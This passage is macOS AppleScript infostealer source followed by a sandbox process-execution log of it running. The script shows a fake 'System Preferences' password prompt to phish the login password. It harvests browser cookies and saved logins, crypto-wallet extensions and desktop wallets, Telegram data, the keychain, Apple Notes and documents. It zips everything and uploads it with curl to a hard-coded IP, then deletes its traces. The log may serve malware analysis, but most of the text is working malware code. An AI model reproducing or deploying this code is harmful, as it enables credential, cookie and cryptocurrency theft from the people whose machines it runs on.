authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper.\nPlease enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'System Preferences' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'keenhcnmdmjjhincpilijphpiohdppno', 'hbbgbephgojikajhfbomhlmmollphcad', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'dhgnlgphgchebgoemcjekedjjbifijid', 'hifafgmccdpekplomjjkcfgodnhcellj', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'jnldfbidonfeldmalbflbmlebbipcnle', 'fdcnegogpncmfejlfnffnofpngdiejii', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'ldinpeekobnhjjdofggfgjlcehhmanlj', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'bcopgchhojmggmffilplmbdicgaihlkp', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'mlhakagmgkmonhdonhkpjeebfphligng', 
'bipdhagncpgaccgdbddmbpcabgjikfkn', 'gcbjmdjijjpffkpbgdkaojpmaninaion', 'nhnkbkgjikgcigadomkphalanndcapjk', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'hoighigmnhgkkdaenafgnefkcmipfjon', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'fhbohimaelbohpjbbldcngcnapndodjp', 'ebfidpplhabeedpnhjnobghokpiioolj', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'penjlddjkjgpnkllboccdgccekpkcbin', 'fhilaheimglignddkjgofkcbgekhenbh', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'cihmoadaighcejopammfbmddcmdekcje', 'lodccjjbdhfakaekdiahmedfbieldgik', 'omaabbefbmiijedngplfjmnooppbclkk', 'cjelfplplebdjjenllpjcblmjkfcffne', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'amkmjjmmflddogmhpjloimipbofnfjih', 'flpiciilemghbmfalicajoolhkkenfel', 'hcflpincpppdclinealmandijcmnkbgn', 'aeachknmefphepccionboohckonoeemg', 'nlobpakggmbcgdbpjpnagmdbdhdhgphk', 'momakdpclmaphlamgjcndbgfckjfpemp', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'fnnegphlobjdpkhecapkijjdkgcjhkib', 'ehjiblpccbknkgimiflboggcffmpphhp', 'ilhaljfiglknggcoegeknjghdgampffk', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'imlcamfeniaidioeflifonfjeeppblda', 'mdjmfdffdcmnoblignmgpommbefadffd', 'ooiepdgjjnhcmlaobfinbomgebfgablh', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'cgeeodpfagjceefieflmdfphplkenlfk', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'bocpokimicclpaiekenaeelehdjllofo', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'ejjladinnckdgjemekebdpeokbikhfci', 'phkbamefinggmakgklpkljjmgibohnba', 'epapihdplajcdnnkdeiahlgigofloibg', 'hpclkefagolihohboafpheddmmgdffjm', 'cjookpbkjnpkmknedggeecikaponcalb', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'modjfdjcodmehnpccdjngmdfajggaoeh', 
'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'kncchdigobghenbbaddojjnnaogfppfj', 'efbglgofoippbgcjepnhiblaibcnclgk', 'mcbigmjiafegjnnogedioegffbooigli', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'apnehcjmnengpnmccpaibjmhhoadaico', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'fopmedgnkfpebgllppeddmmochcookhc', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'dcbjpgbkjoomeenajdabiicabjljlnfp', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'copjnifcecdedocejpaapepagaodgpbh', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'mkchoaaiifodcflmbaphdgeidocajadp', 'ellkdbaphhldpeajbepobaecooaoafpg', 'mdnaglckomeedfbogeajfajofmfgpoae', 'nknhiehlklippafakaeklbeglecifhad', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'fmblappgoiilbgafhjklehhfifbdocee', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'cnmamaachppnkjgnildpdmkaakejnhae', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'odpnjmimokcmjgojhnhfcnalnegdjmdn', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'hpglfhgfnhbgpjdenjgmdgoeiappafln', 'egjidjbpglichdcondbcbdnbeeppgdph', 'ibljocddagjghmlpgihahamcghfggcjc', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'mfhbebgoclkghebffdldpobeajmbecfk', 'nlbmnnijcnlegkjjpcfjclmcfggfefdm', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'acmacodkjbdgmoleebolmdjonilkdbch', 'agoakfejjabomempkjlepdflaleeobhb', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kkpehldckknjffeakihjajcjccmcjflh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'anokgmphncpekkhclmingpimjmcooifb', 'kkpllkodjeloidieedojogacfhpaihoh', 'iokeahhehimjnekafflcihljlcjccdbe', 'ifckdpamphokdglkkdomedpdegcjhjdp', 
'loinekcabhlmhjjbocijdoimmejangoa', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'dmkamcknogkgcdfhhbddcghachkejeap', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'cmndjbecilbocjfkibfbifhngkdmjgog', 'kpfopkelmapcoipemfendmdcghnegimn', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'opcgpfmipidbgpenhmajoajpbobppdil', 'lakggbcodlaclcbbbepmkpdhbcomcgkd', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'hdkobeeifhdplocklknbnejdelgagbao', 'lnnnmfcpbkafcpgdilckhmhbkkbpkmid', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'kmhcihpebfmpgmihbkipmjlmmioameka', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'nngceckbapebfimnlniiiahkandclblb'}set chromiumFiles to {'/Network/Cookies', '/Cookies', '/Web Data', '/Login Data', '/Local Extension Settings/', '/IndexedDB/'}repeat with chromium in chromium_mapset savePath to writemind & 'Chromium/' & item 1 of chromium & '_'tryset fileList to list folder item 2 of chromium without invisiblesrepeat with currentItem in fileListif ((currentItem as string) is equal to 'Default') or ((currentItem as string) contains 'Profile') thenrepeat with CFile in chromiumFilesset readpath to (item 2 of chromium & currentItem & CFile)if ((CFile as string) is equal to '/Network/Cookies') thenset CFile to '/Cookies'end ifif ((CFile as string) is equal to '/Local Extension Settings/') thengrabPlugins(readpath, savePath & currentItem, pluginList, false)else if (CFile as string) is equal to '/IndexedDB/' thengrabPlugins(readpath, savePath & currentItem, pluginList, true)elseset writepath to savePath & currentItem & CFilereadwrite(readpath, writepath)end ifend repeatend ifend repeatend tryend repeatend chromiumon telegram(writemind, library)tryGrabFolder(library & 'Telegram Desktop/tdata/', writemind & 'Telegram Data/')end tryend telegramon deskwallets(writemind, deskwals)repeat with deskwal in deskwalstryGrabFolder(item 2 of deskwal, writemind 
& item 1 of deskwal)end tryend repeatend deskwalletson filegrabber(writemind)tryset destinationFolderPath to POSIX file (writemind & 'FileGrabber/')mkdir(destinationFolderPath)set photosPath to POSIX file (writemind & 'FileGrabber/NotesFiles/')mkdir(photosPath)set extensionsList to {'txt', 'pdf', 'docx', 'wallet', 'key', 'keys', 'doc'}set bankSize to 0tell application 'Finder'tryset safariFolderPath to (path to home folder as text) & 'Library:Cookies:'duplicate file (safariFolderPath & 'Cookies.binarycookies') to folder destinationFolderPath with replacingset name of result to 'saf1'end trytryset safariFolder to ((path to library folder from user domain as text) & 'Containers:com.apple.Safari:Data:Library:Cookies:')tryduplicate file 'Cookies.binarycookies' of folder safariFolder to folder destinationFolderPath with replacingend tryset notesFolderPath to (path to home folder as text) & 'Library:Group Containers:group.com.apple.notes:'set notesAccounts to folder (notesFolderPath & 'Accounts:LocalAccount:Media')duplicate notesAccounts to photosPath with replacingduplicate notesAccounts to POSIX file photosPath as alias with replacingset notesFolder to folder notesFolderPathset notesFiles to {'NoteStore.sqlite', 'NoteStore.sqlite-shm', 'NoteStore.sqlite-wal'}repeat with fileName in notesFilesset sourceFile to file fileName of notesFolderduplicate sourceFile to POSIX file destinationFolderPath as alias with replacingend repeatend trytryset desktopFiles to every file of desktopset documentsFiles to every file of folder 'Documents' of (path to home folder)set downloadsFiles to every file of folder 'Downloads' of (path to home folder)repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)set fileExtension to name extension of aFileif fileExtension is in extensionsList thenset filesize to size of aFileif filesize < 3 * 1024 * 1024 thenif (bankSize + filesize) < 30 * 1024 * 1024 thentryduplicate aFile to folder destinationFolderPath with replacingset bankSize 
to bankSize + filesizeend tryelseexit repeatend ifend ifend ifend repeatend tryend tellend tryend filegrabberon send_data(attempt) try set result_send to (do shell script 'curl -X POST -H \'user: ymM2-77UrW/epIPnrITeT7qu1/XI5sTSC8oK392uMYc=\' -H \'BuildID: GJ/sZekKeEGa8X-KPvO2Y5O6k02IBQT82R/9YoFGnD0=\' -H \'cl: 0\' -H \'cn: 0\' --max-time 300 -retry 5 -retry-delay 10 -F \'file=@/tmp/out.zip\' http://81.19.135.54/joinsystem') on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end tryend send_dataset username to (system attribute 'USER')set profile to '/Users/' & usernameset randomNumber to do shell script 'echo $((RANDOM % 9000 + 1000))'set writemind to '/tmp/' & randomNumber & '/'tryset result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')writeText(result, writemind & 'info')end tryset library to profile & '/Library/Application Support/'set password_entered to getpwd(username, writemind)delay 0.01set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}, {'Arc', library & 'Arc/'}, {'Coccoc', library & 'Coccoc/'}}set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, 
{'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'keychain')if release thenreadwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')readwrite2(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')end ifif filegrabbers thenfilegrabber(writemind)end ifwriteText(username, writemind & 'username')set ff_paths to {library & 'Firefox/Profiles/', library & 'Waterfox/Profiles/', library & 'Pale Moon/Profiles/'}repeat with firefox in ff_pathstryparseFF(firefox, writemind)end tryend repeatchromium(writemind, chromiumMap)deskwallets(writemind, walletMap)telegram(writemind, library)do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'send_data(0)do shell script 'rm -r ' & writeminddo shell script 'rm /tmp/out.zip'
File size:43232 bytes
MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/usr/bin/osascript
Arguments:-
File size:43232 bytes
MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/bin/sh
Arguments:sh -c echo $((RANDOM % 9000 + 1000))
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/usr/bin/osascript
Arguments:-
File size:43232 bytes
MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/bin/sh
Arguments:sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/usr/sbin/system_profiler
Arguments:system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
File size:45472 bytes
MD5 hash:271feb2b4c0447da2b7ac523f13a4824
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/usr/sbin/system_profiler
Arguments:-
File size:45472 bytes
MD5 hash:271feb2b4c0447da2b7ac523f13a4824
Start time (UTC):19:31:53
Start date (UTC):19/01/2025

Path:/usr/bin/csrutil
Arguments:-
File size:29760 bytes
MD5 hash:f2a9b92081c186a37d886e93bc238a40
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/usr/sbin/system_profiler
Arguments:-
File size:45472 bytes
MD5 hash:271feb2b4c0447da2b7ac523f13a4824
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/usr/sbin/system_profiler
Arguments:-
File size:45472 bytes
MD5 hash:271feb2b4c0447da2b7ac523f13a4824
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/usr/bin/osascript
Arguments:-
File size:43232 bytes
MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/bin/sh
Arguments:sh -c mkdir -p '/tmp/4302'
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/bin/mkdir
Arguments:mkdir -p /tmp/4302
File size:18592 bytes
MD5 hash:bbbaafd2a4d7dcb9ddd178d814fea708
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/usr/bin/osascript
Arguments:-
File size:43232 bytes
MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/bin/sh
Arguments:sh -c dscl . authonly 'root' ''
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
Start time (UTC):19:31:54
Start date (UTC):19/01/2025

Path:/usr/bin/dscl
Arguments:dscl . authonly root
File size:202560 bytes
MD5 hash:9a2337f2a5a6271e0187153296de3c9f
Start time (UTC):19:31:55
Start date (UTC):19/01/2025

Path:/usr/libexec/xpcproxy
Arguments:-
File size:44048 bytes
MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
Start time (UTC):19:31:55
Start date (UTC):19/01/2025

Path:/usr/libexec/dirhelper
Arguments:/usr/libexec/dirhelper
File size:39376 bytes
MD5 hash:23edb05ab305e115e8874baa5b1e3004
Start time (UTC):19:32:41
Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/xpcproxy
                                                                      Arguments:-
                                                                      File size:44048 bytes
                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                                                      Start time (UTC):19:32:41
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/firmwarecheckers/eficheck/eficheck
                                                                      Arguments:/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
                                                                      File size:74048 bytes
                                                                      MD5 hash:328beb81a2263449258057506bb4987f